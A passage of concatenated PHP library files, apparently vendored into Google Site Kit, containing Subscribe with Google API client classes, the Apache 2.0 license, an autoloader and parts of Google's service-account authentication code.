LINT.ThenChange(//depot/google3/java/com/google * /subscribewithgoogle/client/opservice/ListPublicationsPromiseGraph.java) * @opt_param string pageToken A token identifying a page of results the server * should return. * @return ListPublicationsResponse * @throws \Google\Service\Exception */ public function listPublications($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListPublicationsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\Publications::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Resource_Publications'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Order; /** * The "orders" collection of methods. * Typical usage is: * <code> * $subscribewithgoogleService = new Google\Service\SubscribewithGoogle(...); * $orders = $subscribewithgoogleService->publications_readers_orders; * </code> */ class PublicationsReadersOrders extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets order's information. (orders.get) * * @param string $name Required. The resource name of the Order. Format: * publications/{publication}/readers/{reader}/orders/{order} * @param array $optParams Optional parameters. * @return Order * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Order::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReadersOrders::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Resource_PublicationsReadersOrders'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Reader; /** * The "readers" collection of methods. * Typical usage is: * <code> * $subscribewithgoogleService = new Google\Service\SubscribewithGoogle(...); * $readers = $subscribewithgoogleService->publications_readers; * </code> */ class PublicationsReaders extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets Reader's Profile information. (readers.get) * * @param string $name Required. The resource name of the Reader. Format: * publications/{publication}/readers/{reader} * @param array $optParams Optional parameters. * @return Reader * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Reader::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReaders::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Resource_PublicationsReaders'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class PurchaseInfo extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $latestOrderId; protected $totalAmountType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Money::class; protected $totalAmountDataType = ''; /** * @param string */ public function setLatestOrderId($latestOrderId) { $this->latestOrderId = $latestOrderId; } /** * @return string */ public function getLatestOrderId() { return $this->latestOrderId; } /** * @param Money */ public function setTotalAmount(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Money $totalAmount) { $this->totalAmount = $totalAmount; } /** * @return Money */ public function getTotalAmount() { return $this->totalAmount; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PurchaseInfo::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_PurchaseInfo'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class CanceledDetails extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $cancelReason; /** * @param string */ public function setCancelReason($cancelReason) { $this->cancelReason = $cancelReason; } /** * @return string */ public function getCancelReason() { return $this->cancelReason; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\CanceledDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_CanceledDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for SubscribewithGoogle (v1). * * <p> * The Subscribe with Google Publication APIs enable a publisher to fetch * information related to their SwG subscriptions, including the entitlement * status of users who are requesting publisher content, the publications owned * by the publisher, the entitlements plans of their SwG readers, the readers' * profile information and purchase order information.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/news/subscribe/guides/overview" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class SubscribewithGoogle extends \Google\Site_Kit_Dependencies\Google\Service { /** See and review your subscription information. */ const SUBSCRIBEWITHGOOGLE_PUBLICATIONS_ENTITLEMENTS_READONLY = "https://www.googleapis.com/auth/subscribewithgoogle.publications.entitlements.readonly"; /** See your primary Google Account email address. */ const USERINFO_EMAIL = "https://www.googleapis.com/auth/userinfo.email"; public $publications; public $publications_entitlements; public $publications_readers; public $publications_readers_entitlementsplans; public $publications_readers_orders; public $rootUrlTemplate; /** * Constructs the internal representation of the SubscribewithGoogle service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://subscribewithgoogle.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://subscribewithgoogle.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1'; $this->serviceName = 'subscribewithgoogle'; $this->publications = new \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\Publications($this, $this->serviceName, 'publications', ['methods' => ['list' => ['path' => 'v1/publications', 'httpMethod' => 'GET', 'parameters' => ['filter' => ['location' => 'query', 'type' => 'string'], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->publications_entitlements = new \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsEntitlements($this, $this->serviceName, 'entitlements', ['methods' => ['list' => ['path' => 'v1/publications/{publicationId}/entitlements', 'httpMethod' => 'GET', 'parameters' => ['publicationId' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->publications_readers = new \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReaders($this, $this->serviceName, 'readers', ['methods' => ['get' => ['path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->publications_readers_entitlementsplans = new \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReadersEntitlementsplans($this, $this->serviceName, 'entitlementsplans', ['methods' => ['get' => ['path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1/{+parent}/entitlementsplans', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->publications_readers_orders = new \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReadersOrders($this, $this->serviceName, 'orders', ['methods' => ['get' => ['path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle'); Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2015 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 1.33.0 <?php namespace Google\Site_Kit_Dependencies; /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ function oauth2client_php_autoload($className) { $classPath = \explode('_', $className); if ($classPath[0] != 'Google') { return; } if (\count($classPath) > 3) { // Maximum class file path depth in this project is 3. $classPath = \array_slice($classPath, 0, 3); } $filePath = \dirname(__FILE__) . '/src/' . \implode('/', $classPath) . '.php'; if (\file_exists($filePath)) { require_once $filePath; } } \spl_autoload_register('oauth2client_php_autoload'); <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * An interface implemented by objects that can get quota projects. */ interface GetQuotaProjectInterface { const X_GOOG_USER_PROJECT_HEADER = 'X-Goog-User-Project'; /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject(); } <?php /* * Copyright 2023 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; interface ExternalAccountCredentialSourceInterface { public function fetchSubjectToken(?callable $httpHandler = null) : string; } <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; /** * Sign a string using a Service Account private key. */ trait ServiceAccountSignerTrait { /** * Sign a string using the service account private key. * * @param string $stringToSign * @param bool $forceOpenssl Whether to use OpenSSL regardless of * whether phpseclib is installed. **Defaults to** `false`. * @return string */ public function signBlob($stringToSign, $forceOpenssl = \false) { $privateKey = $this->auth->getSigningKey(); $signedString = ''; if (\class_exists(\Google\Site_Kit_Dependencies\Google\Auth\phpseclib3\Crypt\RSA::class) && !$forceOpenssl) { $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader::load($privateKey); $rsa = $key->withHash('sha256')->withPadding(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1); $signedString = $rsa->sign($stringToSign); } elseif (\extension_loaded('openssl')) { \openssl_sign($stringToSign, $signedString, $privateKey, 'sha256WithRSAEncryption'); } else { // @codeCoverageIgnoreStart throw new \RuntimeException('OpenSSL is not installed.'); } // @codeCoverageIgnoreEnd return \base64_encode($signedString); } } <?php /* * Copyright 2020 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * A class to implement caching for calls to GCECredentials::onGce. This class * is used automatically when you pass a `Psr\Cache\CacheItemPoolInterface` * cache object to `ApplicationDefaultCredentials::getCredentials`. * * ``` * $sysvCache = new Google\Auth\SysvCacheItemPool(); * $creds = Google\Auth\ApplicationDefaultCredentials::getCredentials( * $scope, * null, * null, * $sysvCache * ); * ``` */ class GCECache { const GCE_CACHE_KEY = 'google_auth_on_gce_cache'; use CacheTrait; /** * @param array<mixed> $cacheConfig Configuration for the cache * @param CacheItemPoolInterface $cache */ public function __construct(?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $this->cache = $cache; $this->cacheConfig = \array_merge(['lifetime' => 1500, 'prefix' => ''], (array) $cacheConfig); } /** * Caches the result of onGce so the metadata server is not called multiple * times. * * @param callable $httpHandler callback which delivers psr7 request * @return bool True if this a GCEInstance, false otherwise */ public function onGce(?callable $httpHandler = null) { if (\is_null($this->cache)) { return \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials::onGce($httpHandler); } $cacheKey = self::GCE_CACHE_KEY; $onGce = $this->getCachedValue($cacheKey); if (\is_null($onGce)) { $onGce = \Google\Site_Kit_Dependencies\Google\Auth\Credentials\GCECredentials::onGce($httpHandler); $this->setCachedValue($cacheKey, $onGce); } return $onGce; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Credentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2; use Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface; use Google\Site_Kit_Dependencies\Google\Auth\ServiceAccountSignerTrait; use Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface; use InvalidArgumentException; /** * ServiceAccountCredentials supports authorization using a Google service * account. * * (cf https://developers.google.com/accounts/docs/OAuth2ServiceAccount) * * It's initialized using the json key file that's downloadable from developer * console, which should contain a private_key and client_email fields that it * uses. * * Use it with AuthTokenMiddleware to authorize http requests: * * use Google\Auth\Credentials\ServiceAccountCredentials; * use Google\Auth\Middleware\AuthTokenMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $sa = new ServiceAccountCredentials( * 'https://www.googleapis.com/auth/taskqueue', * '/path/to/your/json/key_file.json' * ); * $middleware = new AuthTokenMiddleware($sa); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); */ class ServiceAccountCredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface, \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface { use ServiceAccountSignerTrait; /** * The OAuth2 instance used to conduct authorization. * * @var OAuth2 */ protected $auth; /** * The quota project associated with the JSON credentials * * @var string */ protected $quotaProject; /** * @var string|null */ protected $projectId; /** * @var array<mixed>|null */ private $lastReceivedJwtAccessToken; /** * @var bool */ private $useJwtAccessWithScope = \false; /** * @var ServiceAccountJwtAccessCredentials|null */ private $jwtAccessCredentials; /** * @var string */ private string $universeDomain; /** * Create a new ServiceAccountCredentials. * * @param string|string[]|null $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param string|array<mixed> $jsonKey JSON credential file path or JSON credentials * as an associative array * @param string $sub an email address account to impersonate, in situations when * the service account has been delegated domain wide access. * @param string $targetAudience The audience for the ID token. */ public function __construct($scope, $jsonKey, $sub = null, $targetAudience = null) { if (\is_string($jsonKey)) { if (!\file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $jsonKeyStream = \file_get_contents($jsonKey); if (!($jsonKey = \json_decode((string) $jsonKeyStream, \true))) { throw new \LogicException('invalid json for auth config'); } } if (!\array_key_exists('client_email', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the client_email field'); } if (!\array_key_exists('private_key', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the private_key field'); } if (\array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } if ($scope && $targetAudience) { throw new \InvalidArgumentException('Scope and targetAudience cannot both be supplied'); } $additionalClaims = []; if ($targetAudience) { $additionalClaims = ['target_audience' => $targetAudience]; } $this->auth = new \Google\Site_Kit_Dependencies\Google\Auth\OAuth2(['audience' => self::TOKEN_CREDENTIAL_URI, 'issuer' => $jsonKey['client_email'], 'scope' => $scope, 'signingAlgorithm' => 'RS256', 'signingKey' => $jsonKey['private_key'], 'sub' => $sub, 'tokenCredentialUri' => self::TOKEN_CREDENTIAL_URI, 'additionalClaims' => $additionalClaims]); $this->projectId = $jsonKey['project_id'] ?? null; $this->universeDomain = $jsonKey['universe_domain'] ?? self::DEFAULT_UNIVERSE_DOMAIN; } /** * When called, the ServiceAccountCredentials will use an instance of * ServiceAccountJwtAccessCredentials to fetch (self-sign) an access token * even when only scopes are supplied. Otherwise, * ServiceAccountJwtAccessCredentials is only called when no scopes and an * authUrl (audience) is suppled. * * @return void */ public function useJwtAccessWithScope() { $this->useJwtAccessWithScope = \true; } /** * @param callable $httpHandler * * @return array<mixed> { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $token_type * } */ public function fetchAuthToken(?callable $httpHandler = null) { if ($this->useSelfSignedJwt()) { $jwtCreds = $this->createJwtAccessCredentials(); $accessToken = $jwtCreds->fetchAuthToken($httpHandler); if ($lastReceivedToken = $jwtCreds->getLastReceivedToken()) { // Keep self-signed JWTs in memory as the last received token $this->lastReceivedJwtAccessToken = $lastReceivedToken; } return $accessToken; } return $this->auth->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { $key = $this->auth->getIssuer() . ':' . $this->auth->getCacheKey(); if ($sub = $this->auth->getSub()) { $key .= ':' . $sub; } return $key; } /** * @return array<mixed> */ public function getLastReceivedToken() { // If self-signed JWTs are being used, fetch the last received token // from memory. Else, fetch it from OAuth2 return $this->useSelfSignedJwt() ? $this->lastReceivedJwtAccessToken : $this->auth->getLastReceivedToken(); } /** * Get the project ID from the service account keyfile. * * Returns null if the project ID does not exist in the keyfile. * * @param callable $httpHandler Not used by this credentials type. * @return string|null */ public function getProjectId(?callable $httpHandler = null) { return $this->projectId; } /** * Updates metadata with the authorization token. * * @param array<mixed> $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> updated metadata hashmap */ public function updateMetadata($metadata, $authUri = null, ?callable $httpHandler = null) { // scope exists. use oauth implementation if (!$this->useSelfSignedJwt()) { return parent::updateMetadata($metadata, $authUri, $httpHandler); } $jwtCreds = $this->createJwtAccessCredentials(); if ($this->auth->getScope()) { // Prefer user-provided "scope" to "audience" $updatedMetadata = $jwtCreds->updateMetadata($metadata, null, $httpHandler); } else { $updatedMetadata = $jwtCreds->updateMetadata($metadata, $authUri, $httpHandler); } if ($lastReceivedToken = $jwtCreds->getLastReceivedToken()) { // Keep self-signed JWTs in memory as the last received token $this->lastReceivedJwtAccessToken = $lastReceivedToken; } return $updatedMetadata; } /** * @return ServiceAccountJwtAccessCredentials */ private function createJwtAccessCredentials() { if (!$this->jwtAccessCredentials) { // Create credentials for self-signing a JWT (JwtAccess) $credJson = ['private_key' => $this->auth->getSigningKey(), 'client_email' => $this->auth->getIssuer()]; $this->jwtAccessCredentials = new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountJwtAccessCredentials($credJson, $this->auth->getScope()); } return $this->jwtAccessCredentials; } /** * @param string $sub an email address account to impersonate, in situations when * the service account has been delegated domain wide access. * @return void */ public function setSub($sub) { $this->auth->setSub($sub); } /** * Get the client name from the keyfile. * * In this case, it returns the keyfile's client_email key. * * @param callable $httpHandler Not used by this credentials type. * @return string */ public function getClientName(?callable $httpHandler = null) { return $this->auth->getIssuer(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Get the universe domain configured in the JSON credential. * * @return string */ public function getUniverseDomain() : string { return $this->universeDomain; } /** * @return bool */ private function useSelfSignedJwt() { // When a sub is supplied, the user is using domain-wide delegation, which not available // with self-signed JWTs if (null !== $this->auth->getSub()) { // If we are outside the GDU, we can't use domain-wide delegation if ($this->getUniverseDomain() !== self::DEFAULT_UNIVERSE_DOMAIN) 